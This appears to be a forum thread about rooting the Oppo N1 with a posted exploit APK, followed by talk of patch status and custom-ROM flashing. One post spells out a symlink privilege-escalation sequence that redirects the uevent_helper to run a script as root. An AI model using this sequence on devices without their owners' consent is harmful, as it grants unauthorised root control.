APK root exploit

jcase

Retired Forum Moderator / Senior Recognized Develo
Feb 20, 2010
6,331
15,767
0
Sequim WA
I tweeted this a couple week ago before the N1 was publicly out but here you go, nothing fancy, no real ui or output.

Thanks to Saurik and Giantpune for contributing (ie its based on their research)

Install apk, run apk wait 1 minute, install supersu app from market then uninstall with this command

adb uninstall com.qualcomm.privinit
 

Attachments

jcase

Retired Forum Moderator / Senior Recognized Develo
Feb 20, 2010
6,331
15,767
0
Sequim WA
Do you have a link to their research or are their findings private?

Regards,
saurik - his analysis of the "second master key vuln"

giantpune for his symlnink attack vuln in property space:

Code:
/system/bin/mv /data/property /data/backupprop
/system/bin/mkdir /data/property
/system/bin/ln -s /sys/kernel/uevent_helper /data/property/.temp
/system/bin/setprop persist.sys.fail /data/pwn.sh
 
  • Like
Reactions: al33m and Mr_Bartek

coolrevi

Senior Member
Jun 1, 2012
637
146
0
Udupi
I tweeted this a couple week ago before the N1 was publicly out but here you go, nothing fancy, no real ui or output.

Thanks to Saurik and Giantpune for contributing (ie its based on their research)

Install apk, run apk wait 1 minute, install supersu app from market then uninstall with this command

adb uninstall com.qualcomm.privinit
Will this exploit work in any other device. when i try to install the play store warns about the vulnerability. Will this vulnerability be gone after uninstalling oppoown.
 

jcase

Retired Forum Moderator / Senior Recognized Develo
Feb 20, 2010
6,331
15,767
0
Sequim WA
Will this exploit work in any other device. when i try to install the play store warns about the vulnerability. Will this vulnerability be gone after uninstalling oppoown.
Possibly other oppo devices

No it doesnt fix the vuln, just becareful where you install apps from
 

pulser_g2

Admin Emeritus / Senior Recognized Developer
Nov 27, 2009
19,538
11,594
113
a second mater key vulnurability? hmm, so this could might not be patched in 4.4?
great job by the way, i dont have the device but this is interesting!
It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely :)
 

Ricky Divjakovski

Recognized Developer / Recognized Contributor
Feb 4, 2013
5,214
7,595
263
25
Sydney
It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely :)
so your saying in most devices the master key patch could be a possible vulnurabillity still in 4.3?

interesting...
 

jcase

Retired Forum Moderator / Senior Recognized Develo
Feb 20, 2010
6,331
15,767
0
Sequim WA
so your saying in most devices the master key patch could be a possible vulnurabillity still in 4.3?

interesting...
It depends on if OEMs backported it, depends on which build OEMs used and depends on the bug. Four or five different zip parser bugs with similar results. This one I used was patched in 4.3, but other exist.
 
  • Like
Reactions: Ricky Divjakovski

trickraca

New member
Dec 4, 2006
2
0
0
Im trying to figure out why oppown apk will not install in my n1. everytime i try it just. Says app not installed. But on the install screen it says something about being an update to an already installed program. Any clues as to what the issue is? all ive done is update to the latest ota software and im currently located in indonesia if that makes a difference.
 

jcase

Retired Forum Moderator / Senior Recognized Develo
Feb 20, 2010
6,331
15,767
0
Sequim WA
Im trying to figure out why oppown apk will not install in my n1. everytime i try it just. Says app not installed. But on the install screen it says something about being an update to an already installed program. Any clues as to what the issue is? all ive done is update to the latest ota software and im currently located in indonesia if that makes a difference.
Possible they patched it by now, if you are on cyanogenmod you are certainly patched

Sent from my HTC Two
 
  • Like
Reactions: Lastdon2cu

Harfainx

Retired Forum Moderator
Apr 10, 2010
1,656
1,803
113
So show do you root the cyanogenmod edition n1.. Can you help please.. Does it come rooted or what..
You don't need to root if you aren't staying on stock. There's no lock anywhere on the bootloader or anything.

Simply flash TWRP in fastboot, then flash Omni (or whatever else) through TWRP.

You should be able to just flash a SuperSU zip in TWRP as well if you want to root the stock ColorOS.

Sent from my N1 using Tapatalk
 
  • Like
Reactions: jcase

giuliano rigon

Senior Member
Oct 17, 2011
64
5
0
noobish doubts..

You don't need to root if you aren't staying on stock. There's no lock anywhere on the bootloader or anything.

Simply flash TWRP in fastboot, then flash Omni (or whatever else) through TWRP.

You should be able to just flash a SuperSU zip in TWRP as well if you want to root the stock ColorOS.

Sent from my N1 using Tapatalk
Please i ne ed a walthrough..
1) download twrp
2) put it in root of the telephone robot
3) flash it in recovery?
4) reboot recovery wipe cache and dalvik flash omnirom..
Please correct me..
Thank you
 

Harfainx

Retired Forum Moderator
Apr 10, 2010
1,656
1,803
113
1) download twrp Yes
2) put it in root of the telephone Yes
Make sure to copy Omnirom to your phone at some point
3) flash it in recovery? No - Flash TWRP in Fastboot if you haven't flashed the recovery already. Use the official Teamwin site for guidance
4) reboot recovery wipe cache and dalvik flash omnirom.. Wipe Cache, Dalvik, System, and Data
Updates in Red

This is off-topic for this thread though. Questions/Info for flashing Omnirom should be addressed in the Omnirom thread.
 

nowy57

Senior Member
Nov 3, 2007
1,026
665
143
Poland
You don't need to root if you aren't staying on stock. There's no lock anywhere on the bootloader or anything.

Simply flash TWRP in fastboot, then flash Omni (or whatever else) through TWRP.

You should be able to just flash a SuperSU zip in TWRP as well if you want to root the stock ColorOS.

Sent from my N1 using Tapatalk

may you provide to right superSU.zip files

I v got superSU from this link and it doesnt work on first and second CM version :(
I am not rooted yet ...
thnaks
 
Last edited:

giuliano rigon

Senior Member
Oct 17, 2011
64
5
0
not rooted.. confirm i can flash

may you provide to right superSU.zip files

I v got superSU from this link and it doesnt work on first and second CM version :(
I am not rooted yet ...
thnaks
I nave tried my damnedest to root .. Fastboot flashing supersu flashing from recovery Direct install from google play complete unroots and reflash letting recovery do it .. No way..
So now i need a last confirmation.. Can i flash omnirom after wipes even if i am unrooted.. And has anyone rooted omnirom or does it come unrooted.. Thanks for the info .. Another idea.. Flashing color OS footing and then flashing omni.. Or is this a late night bad Dream..

---------- Post added at 01:17 AM ---------- Previous post was at 01:05 AM ----------

That does work. You're likely not removing root, but rather just uninstalling SuperSU.

I answered you in your Q&A thread on root.
Sorry now i got it.. It was in the forums.. Just unchecking the respect cyanogen settings in the super su menu got me roooted and happy.. Sorry for your time.. I flashed super su zip from recovery rebooted and unchecked .. Now i am set..